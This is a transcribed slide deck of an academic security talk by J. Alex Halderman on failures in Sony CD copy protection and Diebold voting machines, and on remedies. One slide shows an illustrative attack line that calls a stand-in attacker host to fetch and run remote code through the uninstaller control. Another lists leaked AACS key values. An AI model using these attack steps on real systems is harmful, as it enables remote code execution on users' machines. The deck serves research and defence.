lessons from security failures in nontraditional computing environments

58
Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman

Upload: diza

Post on 25-Feb-2016

49 views

Category:

Documents


0 download

DESCRIPTION

Lessons from Security Failures In Nontraditional Computing Environments. J. Alex Halderman. CSS 1999. SDMI 2001. CD DRM 2003, 2005. AACS 2007. Diebold 2003, 2006. What’s the common “thread”?. Problem. Platform. Package. Nontraditional Environments. Security Intuition. - PowerPoint PPT Presentation

TRANSCRIPT

Page 1: Lessons from Security Failures  In Nontraditional Computing Environments

Lessons from Security Failures In Nontraditional Computing Environments

J. Alex Halderman

Page 2: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 2

CD DRM2003, 2005

SDMI2001

CSS1999

AACS2007

Diebold2003, 2006

What’s the common “thread”?

Page 3: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 3

Nontraditional Environments

ProblemPlatform Package

Page 4: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 4

Security IntuitionSecurity Intuition Breakdown

Underestimate SimilarityUnderestimate DifferenceUnderestimate Risk

Page 5: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 5

Spectacular Failures

CascadingIrreparableCollateral damage

Page 6: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 6

NontraditionalEnvironments

IntuitionBreakdowns

SpectacularFailures

Page 7: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 7

Disaster Investigation

Page 8: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 8

Questions What about these environments

makes failures especially severe? Are there patterns to the design and

implementation mistakes behind them?

Where are such failures likely to occur in the future?

What tools and techniques can we use to prevent them?

Page 9: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 9

Outline

1. A Model for Security Failures2. Failures in CD-DRM Systems3. Failures in E-Voting Systems4. Predicting Future Disasters5. Remedies and Defensive

Strategies

Page 10: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 10

CD DRM

2001 1st Generation: Passive protection

2003 2nd Generation: Active protection

2005 3rd Generation: Weak passive + Aggressive

active

[H02]

[H03]

[HF05]

Page 11: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 11

Nontraditional Problem

Restrict use(Untrusted device)

Compatibility(Legacy format)

All DRM: No known solution providestraditional security guarantees

Page 12: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 12

Nontraditional Package

Drivers

Ripper/copier Application

Protection driver

Normal CD

OSProtection driver

Autorun

#

CD Marked

“Protected”

Audio CDHybrid

CD

Page 13: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 13

A Spectacular Failure

Failure in depthInstaller → Patch → Uninstaller

Mass exposureMillions of computers vulnerable

Difficult repairsMost users unaware they’re at risk

High costsLawsuits, recalls, lost sales

Page 14: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 14

SunnComm

“Light years beyond encryption™”52 titles

4.7 million discs37 titles

20 million discs

First4Internet

Page 15: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 15

Rootkit

Magic prefix: $sys$

FilesProcessesRegistry keys

Hidden

DRM challenge: Users will remove protection driverVendor response: Install a rootkit to hide it

[HF06]

Page 16: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 16

Rootkit

Exploits in wild Backdoor.Ryknos.B

Trojan.Welomoch

DRM challenge: Users will remove protection driverVendor response: Install a rootkit to hide it

Attack: Privilege escalationMistake: Hides arbitrary objects

$sys$virus.exe

[HF06]

Page 17: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 17

InstallerDRM challenge: Users will decline to install softwareVendor response: Install regardless of consent

Attack: Privilege escalationMistake: Incorrect permissions

M

13+ MB installed before EULA screen

Everyone:Full Control

Runs with administrator privilegesnext time CD is inserted

Page 18: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 18

InstallerDRM challenge: Users will decline to install softwareVendor response: Install regardless of consent

Attack: Privilege escalationMistake: Incorrect permissions

MSony releases patch…but, patch calls potentially booby trapped code [HF06]

How do users know they need to patch? Vulnerable even if refused installation

Page 19: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 19

UninstallersDRM challenge: Angry customers demand removalVendor response: Offer uninstallers, but limit access

“HTTP GET /XCP.dat”

Web page calls ActiveX controlCodeSupport.Uninstall(“http://www.sony-bmg.com/XCP.dat”)

Serversony-bmg.comXCP.dat

ClientCodeSupport.ocx

Client extracts InstallLite.dll from XCP.dat, calls UnInstall_xcp()

2.

3.

4.

User obtains single-use code for uninstallation web page

1.

[HF06]

Page 20: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 20

Control accepts arbitrary URLRemote code not

authenticatedControl not removed after

use

UninstallersDRM challenge: Angry customers demand removalVendor response: Offer uninstallers, but limit access

Attack: Remote code executionMistakes:

“HTTP GET /XCP.dat”Server

sony-bmg.comXCP.dat

ClientCodeSupport.ocx

Rookie mistakes

Victim visits attacker’s web pageCodeSupport.Uninstall(“http://www.attacker.com/Evil.dat”)

1.

2.

Client executes code from Evil.dat with user’s privileges3.

“HTTP GET /Evil.dat”Server

attacker.comEvil.dat

[HF06]

Page 21: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 21

Environmental EffectsTechnology phase change

Risks appear unexpectedlyDRM problem → inherent conflict

Deliberately subvert control of PCLack of transparency

Problems more difficult to detectConflicting incentives

Choose risky DRM over user securityPolitics

Page 22: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 22

Intuition Breakdown

Nearly all parties underestimated security risks:

Vendors

Sony

Users

Experts

“Most people, I think, don't even know what a Rootkit is, so why should they care about it?”

— Thomas Hesse President, Sony BMG Global Digital

Business

Vendors

Sony

Users

Experts

Destroyed by rookie security mistakes

Didn’t know music CDs could hurt them

Didn’t discover rootkit for six months

Page 23: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 23

Outline

1. A Model for Security Failures2. Failures in CD-DRM Systems3. Failures in E-Voting Systems4. Predicting Future Disasters5. Remedies and Defensive

Strategies

Page 24: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 24

Diebold DREs

Page 25: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 25

Nontraditional Package

Page 26: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 26

Nontraditional Platform

Page 27: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 27

Nontraditional Problem

Paperless DREs: No known solutionprovides traditional security guarantees

Voting… Securely Secretly Accessibly Quickly Cheaply

Page 28: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 28

A Spectacular Failure

Failures in depthCode insertion routes, physical

securityMass exposure

Millions of votes at riskDifficult repairs

Some attacks not patchableHigh costs

Many states likely to replace machines

Page 29: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 29

Inserting Code

Bootloader

WinCE Kernel

BallotStation

FBOOT.N

B0

Bootloader

NK.BIN

WinCE Kernel

INSTAL

L.IN

S

BallotStation

(Internal Flash or EPROM)

(Internal Flash)

(Internal Flash)

[FHF07]

EXPL

ORER.G

LB

Page 30: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 30

Inserting Code

WinCE Kernel

BallotStation

Bootloader (Flash)

[FHF07]

Failure in Depth:Boot into ExplorerInsecure firmware

updaterROM replacement

Page 31: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 31

[FHF07]Stealing Votes

WinCE Kernel

BallotStation Stuffer

Page 32: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 32

[FHF07]Stealing Votes

Kernel

BallotStation

Primary Vote Record Backup Vote Record

Audit Log

Primary Vote Record Backup Vote Record

Audit Log

Stuffer

Page 33: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 33

Viral Propagation [FHF07]

Reboot

Page 34: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 34

[FHF07]

Page 35: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 35

Physical Security [FHF07]

Page 36: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 36

Physical SecurityFailure in Depth:

Same key used everywhere

Widely availableSecret disclosed

on web siteLock easy to pick

[FHF07]

Page 37: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 37

Environmental EffectsTechnology phase change

Risks appear unexpectedlyDifficulty of the problem

Confusing threat model, circular reasoning

Lack of transparencyBasic errors persist for yearsSecurity treated as a PR problem

Conflicting incentivesOfficials choose efficiency over security

Politics

Page 38: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 38

Intuition Breakdown

Nearly all parties underestimated security risks:

Vendor

Officials

Experts

Vendor

Officials

Experts

Planned security by obscurityVastly underinvested in security design

Many surprised by severity of problems

Underestimated similarity to PCsDidn’t understand threat model

CAsCAs Lacked institutional competence to see risks

Page 39: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 39

Outline

1. A Model for Security Failures2. Failures in CD-DRM Systems3. Failures in E-Voting Systems4. Predicting Future Disasters5. Remedies and Defensive

Strategies

Page 40: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 40

Learning from Failures

My Past WorkCD DRME-Voting

Related WorkPast Voting StudiesCSS, SDMI, HDCP, DTVWEP, GSM, RFID

Work in ProgressAACSOther voting systems

Future Work(Predicted failures)

Page 41: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 41

AACS [Work in progress]

Title Key

Volume Key

Processing Key

Device Key

February 11

February 24

January 13

January 12Title Key

Volume Key

Processing Key

Device Key

Potential disaster (analyze game theory)

Solid crypto, Rookie coding errors

Revokable Arms Race

Interesting lessons on incentives, politics, law

DRM as nontraditional security problem

09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 bd09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 be09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 bf

?09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c109 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c209 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c3

Page 42: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 42

Other Voting Systems [Work in progress]

Page 43: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 43

Predicting Failures

NontraditionalEnvironment

+Technology

Phase Change

+

Page 44: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 44

Future Failures?

Page 45: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 45

Future Failures?

Page 46: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 46

Future Failures?

Page 47: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 47

Future Failures?

Page 48: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 48

Outline

1. A Model for Security Failures2. Failures in CD-DRM Systems3. Failures in E-Voting Systems4. Predicting Future Disasters5. Remedies and Defensive

Strategies

Page 49: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 49

Defensive Approach

New Intuitions New Technologies New Policies

Page 50: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 50

General LessonsSecurity disasters occur where security research isn’t involved

New intuitions, partnerships, transparencyProblems that resist rigorous security analysis are prone to major failures

Research ways to transform problemsFailures have higher externalities where producer and user incentives misalign

Where appropriate, add liability

Page 51: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 51

Remedies: DRM

New intuition DRM as a risk to client security

New policiesMandatory transparency(DMCA reform, installation disclosure)Liability for aggressive, dangerous techniques (change maker incentives)

Page 52: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 52

Remedies: E-Voting

New intuitionsVoting machines and PCs share vulnerabilitiesNo software should be trusted to count votes

New policiesImproved transparency, certification processesLiability for insecurity: fix at vendor’s cost?(change maker incentives)Software independence

Page 53: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 53

New Technologies[CHF07]Machine-assisted auditing

1. Initial count(untrusted)

2. Recount machinecommits to each ballot

Ballot

3. Humans check sample by hand

Page 54: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 54

C := H(…)C := H(…)

New Technologies[HW07]Harvested verifiable challenges

1. Collect fresh data from varied sources

2. Hash data toform “challenge”

3. Anyone can verifychallenge was valid

?

Page 55: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 55

Contributions1. New model for security failures

Analysis of past failures from the literaturePredictions for future failuresPolicy implications

2. Analysis of failures in DRM systemsInherent limitations of CD copy protection[H03,H04] Client security failures from Sony CD DRM[HF06]Coming AACS arms race*

3. Analysis of failures in e-voting systemsDiebold AccuVote TS and TSx[FHF07]AVC Advantage*

4. Technological remediesMachine-assisted election auditing[CHF07]Harvesting verifiable challenges[HW07]Privacy management for mobile devices[HWF05]

Page 56: Lessons from Security Failures  In Nontraditional Computing Environments

J. Alex Halderman 56

ReferencesH03 J. A. Halderman. “Evaluating New Copy-Prevention

Techniques for Audio CDs.” DRM 2002.H04 J. A. Halderman. “Analysis of the MediaMax CD3 Copy-

Prevention System.” 2003.HWF04 J. A. Halderman, B. Waters, and E. Felten. “Privacy

Management for Portable Recording Devices.” WPES 2004.HF06 J. A. Halderman and E. Felten. “Lessons from the Sony CD

DRM Episode.” USENIX Security 2006.FHF07 A. Feldman, J. A. Halderman, and E. Felten. “Security Analysis

of the Diebold AccuVote-TS Voting Machine.” In submission, 2007.

CHF07 J. Calandrino, J. A. Halderman, and E. Felten. “Machine-Assisted Election Auditing.” In submission, 2007.

HW07 J. A. Halderman and B. Waters. “Harvesting Verifiable Challenges from Oblivious Online Sources.” In submission, 2007.

Page 57: Lessons from Security Failures  In Nontraditional Computing Environments

Lessons from Security Failures In Nontraditional Computing Environments

J. Alex Halderman

Page 58: Lessons from Security Failures  In Nontraditional Computing Environments